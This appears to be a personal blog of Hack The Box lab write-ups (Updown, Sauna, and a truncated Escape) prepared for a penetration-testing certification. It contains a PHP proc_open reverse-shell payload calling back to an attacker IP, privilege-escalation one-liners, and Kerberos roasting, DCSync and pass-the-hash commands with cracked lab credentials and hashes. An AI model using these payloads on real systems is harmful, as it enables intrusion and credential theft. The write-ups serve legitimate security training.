CPTS on Emil Pawlak

Updown

EmilPawlak@protonmail.com (Emil Pawlak) — 12.04.2026

Enumeration

nmap

I start with a nmap scan which shows that the only ports opened are HTTP, SSH on TCP and DHCP on UDP.

nmap scan results

Nmap scan report for 10.129.227.227
Host is up (0.040s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 3072 9e:1f:98:d7:c8:ba:61:db:f1:49:66:9d:70:17:02:e7 (RSA)
| 256 c2:1c:fe:11:52:e3:d7:e5:f7:59:18:6b:68:45:3f:62 (ECDSA)
|_ 256 5f:6e:12:67:0a:66:e8:e2:b7:61:be:c4:14:3a:d3:8e (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Is my Website up ?
|_http-server-header: Apache/2.4.41 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=4/9%OT=22%CT=1%CU=34949%PV=Y%DS=2%DC=I%G=Y%TM=69D81DCE
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)SEQ(
OS:SP=104%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=105%GCD=1%ISR=10D%TI=Z%C
OS:I=Z%II=I%TS=A)SEQ(SP=F4%GCD=1%ISR=F8%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=F8%GCD=1
OS:%ISR=108%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M4E2ST11NW7%O2=M4E2ST11NW7%O3=M4E2NN
OS:T11NW7%O4=M4E2ST11NW7%O5=M4E2ST11NW7%O6=M4E2ST11)WIN(W1=FE88%W2=FE88%W3=
OS:FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M4E2NNSNW7%CC=Y%
OS:Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40
OS:%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q
OS:=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IP
OS:L=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.58 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-09 23:44 CEST
Nmap scan report for 10.129.227.227
Host is up (0.028s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 11.93 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-09 23:45 CEST
Nmap scan report for 10.129.227.227
Host is up (0.028s latency).
Not shown: 999 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc

Nmap done: 1 IP address (1 host up) scanned in 1011.77 seconds

HTTP

Looking at the website we can see that it’s conceptually a simple website that checks if another given website is up, or down. Looking around the mechanism normally and through burpsuite I can see that there is a lot of filtering around the input. The most bare down version of a query is “h://t” but any type of injection or inclusion are being caught by the system’s logic.

Now I’ll set up a listener and see if the checker connects - it does. I now created a PHP shell and I’ll see if it executes it. Unfortunately it doesn’t.

I scanned for different subdomains and directories with [[ffuf]] and I found “dev” for both of the scans. It however only shows a 403 - forbidden error.

I started another directory enumeration with ffuf - this time inside /dev and it came I found a “.git” directory. I didn’t think of it as valuable at first, but after some digging and reading it can hold some nice data. I also found this tool named git-dumper which seems it could be useful exactly for that.

Git code review

I tested both manual enumeration and with git-dumper. The second one is in my opinion superior as the tool doesn’t only download and list files from /.git as I expected - it reconstructs the repo itself rebuilding the actual working directory from the git objects.

From the “changelog.txt” I learn that there is an upload option on the website and a plan for a new admin panel. Checking the “checker.php” I found some interesting information about the logic of the website, especially these parts:

# Check if extension is allowed.
	$ext = getExtension($file);
	if(preg_match("/php|php[0-9]|html|py|pl|phtml|zip|rar|gz|gzip|tar/i",$ext)){
		die("Extension not allowed!");
	}

# Create directory to upload our file.
	$dir = "uploads/".md5(time())."/";
	if(!is_dir($dir)){
 mkdir($dir, 0770, true);
 }
 
# File size must be less than 10kb.
	if ($_FILES['file']['size'] > 10000) {
 die("File too large!");
 }

Key information:

I know which extensions are not allowed
I know the upload location and the naming convention of the uploaded file too
I know that the file must be smaller than 10 kB.

Now my task is to structure an attack path that will check all of these boxes. Firstly, one php related extension which can execute that I don’t see mentioned in the script is “.phar”. With a reverse shell named “shell.phar” I would need to access it under “http://siteisup.htb/uploads//shell.phar” - let’s see if I’m right.

I create a shell file, the payload itself is from PentestMonkey. I started a python server where my shell resides with azaeir@parrot (~/Desktop/htb/machines/updown): python -m http.server 1338, I requested the shell from the siteisup.htb and got a confirmation that it was successful. This confirmation also contains a timestamp 10.129.227.227 - - [11/Apr/2026 16:51:45] "GET /shell.phar HTTP/1.1" 200 -. I quickly read that the PHP’s time() function uses epoch format. I could’ve ran the function myself, but I found a simple website that converts time dates into epoch. I take my output of “1765462305” and run it against a hash generator and get my hash - here is the process:

11/Apr/2026 16:51:45 - Original
11/Apr/2026 14:51:45 - Converted to UTC
1775919105 - Converted into Epoch
696c4310b51bd75fc8591dca1f24e191 - Hashed with MD5

Sadly - even though it would be a cool technique - this doesn’t work. This could be because of the server using different time or the last function in the script which might automatically delete uploaded files to block this whole attack path.

I decided to step back and carefully read through all the files and try to understand them.

Foothold

Setting up the header

In the .htaccess there is a rule that blocks all traffic unless a request includes the “Special-Dev header set to “only4dev”, which then grants access via an environment flag. Let’s try to access both the normal and the dev. subdomain.

I can’t seem to make it work with burpsuite, I get a time-out, but curl does work curl -H "Special-Dev: only4dev" http://dev.siteisup.htb. To make it work better I found this firefox add-on which made it persistent.

PHP wrappers

At this point I struggled a lot. I got access to the developer which allowed me this time to upload a file with URL addresses to check if they are up or down. I wasn’t able to upload any rev shells or webshell because of the extension limits I saw in the source code. When I accessed the admin page I noticed a “page” get parameter so I decided to look for some PHP filters and attempt LFI but this also failed. While researching PHP filters I stumbled upon the topic of PHP wrappers. In short, PHP wrappers allow PHP to read a bunch of different streams of data. So besides being used with http:// or https:// it can also understand zip://, phar:// and a bunch of more of them. As I wasn’t able to input basic php extensions I wanted to upload a zip file with my rev shell but it didn’t work. I guess partially because of the fact that php was also somewhere in the code mentioned to be black listed, and, also because they might be further filtering for PHP functions rendering most of the shell useless. I decided to create a zip file but change it’s extension to something random, hoping that filtering doesn’t check the magic bytes and run <?php phpinfo(); ?>. To access this file, I decided to try phar as it behaves in a lot of ways like zip data stream but it might’ve not been blocked and to my surprise, this combination worked. http://dev.siteisup.htb/?page=phar://uploads/4eba46216cd35f13b3cd75de77575283/info.az/info.

In phpinfo I can see a big list of disabled function which explains why my shells didn’t work.

pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,error_log,system,exec,shell_exec,popen,passthru,link,symlink,syslog,ld,mail,stream_socket_sendto,dl,stream_socket_client,fsockopen

Bypassing filters

I could look through them manually and see if there are any that were not mentioned, but I much more prefer to use dfunc-bypasser. The original dfunc runs on python2 which is deprecated, but I luckily found a python3 fork. When I ran this script it didn’t want to connect to the site, this is likely because of the fact that we need a special header to access it. I made a copy of the tool and looked through it to see if I can add edit the header somewhere in it but I wasn’t able to figure it out. I just decided to cut my losses and examine the list myself. It would be a big waste of time if I started to edit a python script for it to not find any functions.

I wanted to go one-by-one through the functions. Then I thought I could make some short python script/loop that would check phpinfo() output and mark those vulnerable functions and lastly I though “this functionality must be in the dfunc-bypasser itself, right?” Because of that I noticed two easy way to enumerate those functions.

Firstly there is no need to edit the dfunc-bypasser, there is a simple -H flag which worked for me dfunc-bypasser.py --url 'http://dev.siteisup.htb/?page=phar://uploads/9d7e3ad5bd39603e06555b7ab37a490d/info.az/info' -H 'Special-Dev=only4dev'.

Secondly, there is a --file flag which takes a local file of phpinfo so one could dump the data from the website and parse it that way.

Setting up a shell

Finally, I can see that proc_open is a function that is not being filtered.

To exploit this function I started to look for different web shells like this one or this one. I swapped through a bunch of them until I finally found one that worked and didn’t use any forbidden functions:

<?php
$descriptorspec = array(
 0 => array("pipe", "r"), // stdin
 1 => array("pipe", "w"), // stdout
 2 => array("pipe", "w") // stderr
);

$process = proc_open('/bin/bash -c "bash -i >& /dev/tcp/10.10.15.189/1337 0>&1"', $descriptorspec, $pipes);

if (is_resource($process)) {
 fclose($pipes[0]);
 fclose($pipes[1]);
 fclose($pipes[2]);
 proc_close($process);
}
?>

I put it in “procopenshell.php” and zipped it using an arbitrary extension - zip proc.lol procopenshell.php. I started a listener to catch the shell - rlwrap -r nc -lnvp 1337 And soon after I uploaded the file, I access the shell with this URL http://dev.siteisup.htb/?page=phar://uploads/b47622cacd7fde0edbbdcea9c74b7e28/proc.lol/procopenshell

What I found confusing is that I had to specify an extension for procopenshell.php even though the websites logic showed that it will append it itself. Without the extension, shell doesn’t execute. Maybe it’s because the file is in an archive? I guess it just checks the initial archive folder and doesn’t look inside - hard for me to tell.

www-data

Anyway, with this we finally get a shell as a www-data user.

www-data@updown:/home/developer/dev$ ls -la
ls -la
total 32
drwxr-x--- 2 developer www-data 4096 Jun 22 2022 .
drwxr-xr-x 6 developer developer 4096 Aug 30 2022 ..
-rwsr-x--- 1 developer www-data 16928 Jun 22 2022 siteisup

Looking around the machine, I see that there is a user.txt flag located in the developer home directory. I can’t access it, because I lack permissions to read it. In the home directory of that user there is a /dev folder which hosts two files - “siteisup” and “siteisup_text.py”.

Looking at the files I can see that siteisup has a sid as root so this is likely a way to priv-esc.

Looking at siteisup with the strings command I can see that it is related to siteisup_text.py.

Welcome to 'siteisup.htb' application
/usr/bin/python /home/developer/dev/siteisup_test.py

Next step is to read and understand the second script.

import requests

url = input("Enter URL here:")
page = requests.get(url)
if page.status_code == 200:
	print "Website is up"
else:
	print "Website is down"

I missed this detail few first times I read the code, but apparently this is a Python2 code and it uses the input() function to get user input which luckily for me also automatically executes code. This function uses eval() in the backend meaning it behaves like eval in all other languages!

First i tried a code injection with __import__('os').system('bash') into siteisup_test.py but it hangs the shell up.
Then, I tried a code injection with __import__('os').system('bash') into siteisup which worked without any issues.

developer

With that, I got a partial access as the developer account. The word partial is important - in reality - I only siteisup tool as the developer, other than that my permissions are still www-data level.

-rw-r----- 1 root developer 33 Apr 12 10:06 user.txt
cat user.txt
cat: user.txt: Permission denied

Luckily, quickly looking around the developer’s home directory I found their id_rsa private key. Which I copied, changed permissions and ran which game me full permissions as that account.

Privilege Escalation

I started my further enumeration with checking if I have any sudo access, turns out that I do.

developer@updown:~$ sudo -l
Matching Defaults entries for developer on localhost:
 env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User developer may run the following commands on localhost:
 (ALL) NOPASSWD: /usr/local/bin/easy_install

I never heard of easy_install, but I googled it and it actually is in GTFOBins.

I simply had to create a fake setup.py holding my bash payload inside, setup a listener on my attacker host, and run the script with sudo.

developer@updown:~$ echo 'import os; os.system("exec /bin/sh </dev/tty >/dev/tty 2>/dev/tty")' >setup.py
developer@updown:~$ cat setup.py
import os; os.system("exec /bin/sh </dev/tty >/dev/tty 2>/dev/tty")
developer@updown:~$ sudo easy_install .

And boom, there is root.

Closing Thoughts

Updown is a really challenging machine very focused on niche web exploitation, solid code review and careful parameter manipulation to actually exploit the attack vectors.

It would be tough not to admit that I struggled at almost every point of this box. I learned a lot of new attack paths and I had to level up my game around code review, web attacks as well as injections and bypasses.

Sauna

EmilPawlak@protonmail.com (Emil Pawlak) — 09.04.2026

Enumeration

nmap

As usual, I start with running a nmap scan with sudo nmap -sC -sV -Pn -O 10.129.95.180; sleep 5; sudo nmap -p- -Pn 10.129.95.180; sleep 5; sudo nmap -sU -Pn 10.129.95.180.

nmap scan results

Nmap scan report for 10.129.95.180
Host is up (0.029s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Egotistical Bank :: Home
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-04-08 23:27:02Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019
Aggressive OS guesses: Windows Server 2019 (97%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
| date: 2026-04-08T23:27:10
|_ start_date: N/A
| smb2-security-mode: 
| 3:1:1: 
|_ Message signing enabled and required
|_clock-skew: -1h00m01s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.38 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-09 02:27 CEST
Nmap scan report for 10.129.95.180
Host is up (0.029s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49676/tcp open unknown
49688/tcp open unknown
49696/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 104.50 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-09 02:29 CEST
Nmap scan report for 10.129.95.180
Host is up (0.030s latency).
Not shown: 996 open|filtered udp ports (no-response)
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap

Results show general Windows Active Directory open ports. For an initial enumeration the most interesting ports are DNS, HTTP and SMB. If I won’t find an attack vector there I would go and enumerate LDAP, RPC and later ADWS.

Additionally from the nmap scan I learn that the domain name is “EGOTISTICAL-BANK.LOCAL” which I added to my /etc/hosts file.

I started with SMB anonymous access bit it didn’t work. I also don’t know the DC name so I will postpone my DNS enumeration for now.

Website

I enumerated the website. Besides the funny theme of it, I found three different forms - newsletter, comment section and a contact form. I tried to provide basic, expected data into them and they all errored out with a 405 page.

405 - HTTP verb used to access this page is not allowed.
The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access.

This is a strange behavior. A http verbs like “POST”, “GET”, “PUT”, “DELETE” etc. Do test this behavior out I ran BurpSuite and checked which verbs worked. From my testing the POST request format as a whole is not working and when changed to GET the response code turns to 200.

Due to the POST body turning into a GET parameter, I tried to inject the parameters with SSTI strings, XSS code and finally SQL injections manually but I didn’t create any unexpected behavior. I then saved BurpSuite requests to those 3 forms and forwarded them into sqlmap to further check for vulnerabilities there.

In the meantime I ran a directory and subdomain enumerations with ffuf. This ffuf -u http://EGOTISTICAL-BANK.LOCAL/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt directory enumeration command returned:

css [Status: 301, Size: 157, Words: 9, Lines: 2, Duration: 28ms]
fonts [Status: 301, Size: 159, Words: 9, Lines: 2, Duration: 30ms]
IMAGES [Status: 301, Size: 160, Words: 9, Lines: 2, Duration: 30ms]
Fonts [Status: 301, Size: 159, Words: 9, Lines: 2, Duration: 27ms]
CSS [Status: 301, Size: 157, Words: 9, Lines: 2, Duration: 31ms]

So no interesting directories have been found at the first glance.

ffuf -u http://EGOTISTICAL-BANK.LOCAL/ -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.EGOTISTICAL-BANK.LOCAL" -fs 32797 Showed no new subdomains so the DC hostname is still unknown.

RID bruteforcing

I tried to enumerate other host users with a netexec rid-brute, but it didn’t work. Guest account is either disabled or was denied.

DNS

For the next step I ran the dig command to enumerate some basic information about the domain itself. In a SOA record I found what is most likely the DC name. EGOTISTICAL-BANK.LOCAL. 3600 IN SOA sauna.EGOTISTICAL-BANK.LOCAL. hostmaster.EGOTISTICAL-BANK.LOCAL. 50 900 600 86400 3600 Besides that, I didn’t find any other useful data there.

LDAP

I checked LDAP with ldapsearch and it worked with an anonymous access ldapsearch -x -H ldap://10.129.95.180/ -b "DC=EGOTISTICAL-BANK,DC=LOCAL". This resulted in some interesting information:

Info:
ms-DS-MachineAccountQuota: 10
msDS-Behavior-Version: 7
msDS-PerUserTrustQuota: 1
msDS-AllUsersTrustQuota: 1000
msDS-PerUserTrustTombstonesQuota: 10

# Hugo Smith, EGOTISTICAL-BANK.LOCAL
dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL

minPwdLength: 7
lockoutThreshold: 0

Key facts:

Each user can create 10 machine account
Passwords can have minimum of 7 characters
There are no lockouts
There is a user “Hugo Smith” on the box

Foothold

fsmith

Looking at the website I found this user mentioned around other people. Seeing as I have basic information about the password policy and I know some users I could consider a bruteforce attack if I won’t find any other valid vector.

Interestingly, on the website there is “Hugo Bear” and “Fergus Smith” but in the LDAP search I found “Hugo Smith”.

I double-checked other options to pivot, but besides running more wordlists for directories, subdomains are performing an IIS tilde enumeration which would a considerable time to setup I could only bruteforce some usernames and later passwords.

I already found a number of usernames on the website and with my LDAP enumeration. I don’t know the format they user in the company so I decided to use username-anarchy to generate a number of common formats with their full names. I tried to create a nice loop with for and while but I couldn’t make it run username-anarchy correctly for some reason. To save some time I just manually swapped the username data in the username-anarchy Sophie Driver >> users.txt command and create the username list that way.

With this list I ran kerbrute userenum -d EGOTISTICAL-BANK.LOCAL --dc sauna.EGOTISTICAL-BANK.LOCAL users.txt and came with two valid users “hsmith@EGOTISTICAL-BANK.LOCAL” and “fsmith@EGOTISTICAL-BANK.LOCAL”.

I took those usernames, created a smaller wordlists having variants with and without the domain attached and ran them against a relatively small wordlists. Then, I just ran netexec smb 10.129.95.180 -u users.small -p /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10k-most-common.txt.

While this is going, when I used kerbrute I had an idea. I can check for kerberoast and as-rep roastable users. Nevermind, without any creds, I can only as-rep roast - let’s do it anyway. GetNPUsers.py -request -usersfile users.small -dc-host sauna.EGOTISTICAL-BANK.LOCAL EGOTISTICAL-BANK.LOCAL/ -no-pass

We get one hit really

Loot:
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:c53a1f5178113124e04b6272ff3b310b$e1e03544cd582d16c1a209f6d03eade305d1486987508688163a7e59956eabf6c5fa32f62531f72a4c0086d683e87fe7c112b6029171b747db50cc455a0b7deef4e0af2ec47dddd9fba2875e1ad2023eaa1c0a77fe06d65771e6171aa3650167b3360d9adb98d4e05fa1b78208c715b1bc14d9addab4079e68a3bddfa3173a5bba4f2865f69a746762bb2e42d5847a15ba7312cbd5d63457cf1178e6ec7295fce2895c088076ab2cfee7e47f6e100729a6010faa4ec70cadf185c17c76b56c72b748410da8b3b07e50ce934e309b2897a8c4364c2f4c0e7c05471f70fc9e309df3430315fd02343141e78b496813798e23be753b581de2681ed27b4897d68998
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL@EGOTISTICAL-BANK.LOCAL:113e3f966c27ca16a99365459ace54ea$a20ebb88b9d118baf304c1a5f374bb80655e2e7cbae4ec8fc8ca5b5c99b320b7775219c33d71b3c9535aa86ce96915b972c6d042de65eddbc3692949b91c3413ab41ca8b4923a367ce68f904b3f4c1198d17c3c81b50bb3ec2486018650402c26d8024a37da117bc127e20f1724675b1da7223716fd75258cfa4c9a5ef28916e7d20644ae91110680532fffba712e0ffc40410747e7c3410c56ccbdb351ec2f05feb11f54de652b047afca7b47e770c744b46e8ec9d632e1acd58a5d97819615e6dbf0a05b7d502badde77179c89fcd5c48df80e64eef99b375333c37febe38f2120d4f59e5d50d23168e202fad03c85b6e3a72c28a940ab16557deeb87bd7d6

I scraped that data for the user fsmith into a separate file and run it through rockyou.txt hashcat -m 18200 fsmith.asrep /usr/share/wordlists/rockyou.txt. We got credentials! fsmith:Thestrokes23

I checked different services that the user can access with netexec and found that they can winrm into the host and see some non-default SMB shares. I went into the host, and grabbed a user flag from there. I did some manual enumeration and didn’t find anything promising. In the /Users file we can see once service account which has an unexpected error message when we try to access their files Cannot find path 'C:\Users\svc_loadnmgr' because it does not exist.

Looking at those SMB shares, one of the custom ones is most interesting as I have write permissions on it, “RICOH Aficio SP 8300DN PCL 6” with a remark “We can’t print money” - let’s check it out. smbclient -U fsmith "//10.129.95.180/RICOH Aficio SP 8300DN PCL 6". Sadly I can’t view the contents of this share. Looking at the second one “print$” we can see that it’s likely connected to a printer or to its configuration or internal file structure.

Bloodhound

It all seems to be hinting for like a printerspooler priv-esc vector. Before I decide on my path, let’s check bloodhound first. bloodhound-python -u fsmith -p 'Thestrokes23' -d EGOTISTICAL-BANK.LOCAL -dc sauna.EGOTISTICAL-BANK.LOCAL -ns 10.129.95.180 -c all; rusthound-ce -d EGOTISTICAL-BANK.LOCAL -u fsmith -p 'Thestrokes23' --zip -c All

Bloodhound shows that:

“SAUNA.EGOTISTICAL-BANK.LOCAL” computer object has weak supported encryption types
“HSMITH@EGOTISTICAL-BANK.LOCAL” is kerberoastable
“SVC_LOANMGR@EGOTISTICAL-BANK.LOCAL” has GetChanges on “EGOTISTICAL-BANK.LOCAL” itself.

Looking at the RICOH Aficio SP 8300DN PCL 6 printer OSINT I see it was related with some vulnerabilities in the past. This is likely something I could use. My current plan of attack is to kerberoast HSmith. Then I will see if he has any additional accesses (like that SMB share), and then look for a printer exploit. I suspect that a successful exploit will drop me into a svc_loanmgr account which I hope has DCSync rights.

Privilege Escalation

hsmith

I start with that kerberoast. First sudo ntpdate 10.129.95.180 to fix the skew, and then GetUserSPNs.py -request-user hsmith -dc-ip 10.129.95.180 EGOTISTICAL-BANK.LOCAL/fsmith:Thestrokes23. Below is the hash.

$krb5tgs$23$*HSmith$EGOTISTICAL-BANK.LOCAL$EGOTISTICAL-BANK.LOCAL/HSmith*$87d4af1eafee29c894d27ab456393742$bdfdc805b821d7aaf3a5aedfae4002a103da6786c62849393f39742c2fd31fa53569e62c5fb1b19d1f9e49168ce774d807127ec4ff8d92937e4a81b7e66ea688c0be7a6c15b23c9fe00e6d1a020581f46d8496ea3526704daf5920b793dfd82304371d6d3c545fa62f6177a32ad861f0a54e4254f06855e3052b30f619a6677c6b2c94687dc7642ad071372c098f94fcada4184fa681d7e09b33c515743518f602ace271d6d97d8dcd79384940272e0d2a8352b4fe95d492e183e47b060e9b3548da2a3912955f3828a37fa2bfbc5d210df19a5e3ccaba94e5f6de442e1f1ae488924b2c0d109ef2a64f7c713ef0de1be16ec3f7310b0a4c477e84b5ce239e476fb8cdafd5023aa0918db59751473c71759c6ab69db9500848bb6506a47c223e72eb4b6f02e1e89f265d0a7e7ca08c28308fd5a8a837ea03a315477b57a1ffa4a04baf5e8f0f75fc4f43e571685fa1f983b03f44de78eafbd2d9f56c3643b55ee6c9d928a935d5cafd4f94ce47c38de6259973a3843f2e2145a159d180191186b157e340f239d9356a6c39d00f5d1e75b3ef77796a775f8ab0a83d2a19da68cd3ef4b977cf23adec084d357e7081b18c66e7979fe1a2074e52a7d416cde0cf4abce3d1f2137278eb1ebc2eb024d8f971fa870adf29e1bb0d07f1e7350d5196767063b4ab7358c0087a7dfc94318a947f23aa81644bfbd0bc067ad88bfd5ff64603a56705b79b8af422ae66f802fa519e07cf3e6fa6c2562a4cff0a76e4f88d1a0ae9503c64056a90b5b5b95037168ee01b1a15152bb9dceb43ac01fa713c4afbdfa35f28d188bda987e4d564dcf68852b0b1fdee4f3aefd3d3d724a11f818b337959ac353d5637236544e7071dcf31dd142f2550b0e3fc5f88e84e097f8844ca9cf0639ebf32874145b1ee79bb13ad9d4027c7650520781652945a811d5f6d35d44fa76937de1f9b2e08d1558615339c9030fd1b321860ca715a091e929f4048bd65fb113745c7d650ee090c5014c3334d3637c729cc2139f418b91270810bdcd2357572af0ab2331afcc4449016f01ecffffff1d8abcdcd77c8c2ef22383db03657aed641d544be2da47b2c5aade8033806821dc89212fbf3e7dc177637403a1f1c4c05878b238ae429f970f127a100d8fc72475be187bed11dbf6aa6e2c6222f86f036532c773c05003d2593fc1f6949c37812ad0b3f9f1034e087b2dc735be9e0934a88c082517fbc85591a61290ff1df4d164e92a8f049919086da586ee9a04cab70538cf2f302de60cbb00a0cba47ec0b88bc0faa267c728479035b29d0ca4099fbea1bb7a93246618875576a171cacbf34f0a117eac91334aeee1009e4fcb6092e20a08fdde8c270828cf09e8f695620adb8bca857b39cc6d5e7b4f7f7157ee3058d

I put it into a separate file and run through rockyou.txt with hashcat -m 13100 hsmith.tgs /usr/share/wordlists/rockyou.txt. I cracked the passwords and it’s “Thestrokes23” the same one as for fsmith. I enumerated this account a bit and it seems to have the same set of rights and permissions as fsmith but lacking in some aspects - lack of winrm for example.

I feel like this is a unintended to follow this new account. I will read up on that printer and think of a plan how to exploit it with my correct credentials. If nothing will come to my mind I will consider looking if I can somehow enable the svc_loanmgr account and maybe run WinPEAS as well.

svc_loanmgr

Promising article. There seems to be also a Metasploit module for it, but I’d rather do it manually. I studied this article and tried to edit attached scripts but I didn’t feel confident they would work. I went the Metasploit way, I created a meterpreter shell, ran it and caught it with exploit/multi/handler and tried to run the exploit from there. On both x64 and x86 versions of the payload I got information that the payload failed because the architecture didn’t match the environment. I tried migrating the process around to no avail.

I decided to take a step back and run WinPEAS on the target host to look for any alternative ways to priv-esc. To my surprise, winpeas found clear-text autologon credentials! I don’t think I ever seen them utilized on a box before - svc_loanmanager:Moneymakestheworldgoround! I checked possible access with netexec but I didn’t find anything. I also struggle to spawn a cmd or PowerShell shell with runas within winrm.

Previously I noted this fact "SVC_LOANMGR@EGOTISTICAL-BANK.LOCAL" has GetChanges on "EGOTISTICAL-BANK.LOCAL" itself. I will try to run secretsdump.py with the creds I know and maybe I will be able to dump the data. secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmanager:'Moneymakestheworldgoround!'@sauna.EGOTISTICAL-BANK.LOCAL

I wasn’t able to dump that data and a struggle a lot to understand why the user is not being found by my tools. I search with ldapsearch and enumerated a lot of data. I later realized that the user was names first “svc_loanmanager” but in bloodhound it’s “svc_loanmgr”. I took me too long to admin that mistake. Even though I fixed my secretsdump.py syntax it still would allow me to dump the data.

Administrator

I then double-checked my permissions in bloodhound and proceeded to download mimikatz on the target. I wasn’t able to run it interactively with .\mimikatz.exe as it looped in trying to start mimikatz in that mode. To avoid it, I ran it with one liners like .\mimikatz.exe "lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:Administrator" exit.

This command returned the administrator’s NTLM hash - 823452073d75b9d1cf70ebdf86c7f98e which I used with evil-winrm -i 10.129.95.180 -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e

Closing Thoughts

Sauna is an interesting machine. It goes through a relatively straight-forwards attack path but I fell into a number of false assumptions and rabbit-holes which costed me a lot of time. It’s serves as a great reminder to perform a full enumeration before jumping into any conclusions, to leave no stone upturned and to pay attention to small details.

My first assumption was that the foothold will be related to the website, but at the end it wasn’t really useful besides learning the names of some users. Later I convinced myself that the correct privilege escalation vector will be related to a printer - CVE-2019-19363 to be specific - but it wasn’t it at all. Lastly I wasted a lot of additional time figuring out why “svc_loanmanager” didn’t work, and I didn’t connect the dots that the username was wrong or just edited in the past.

Fun box.

Escape

EmilPawlak@protonmail.com (Emil Pawlak) — 08.04.2026

Enumeration

I ran my favorite nmap commands on the provided IP.

nmap scan results

Stats: 0:00:00 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.55% done
Nmap scan report for 10.129.19.47
Host is up (0.028s latency).
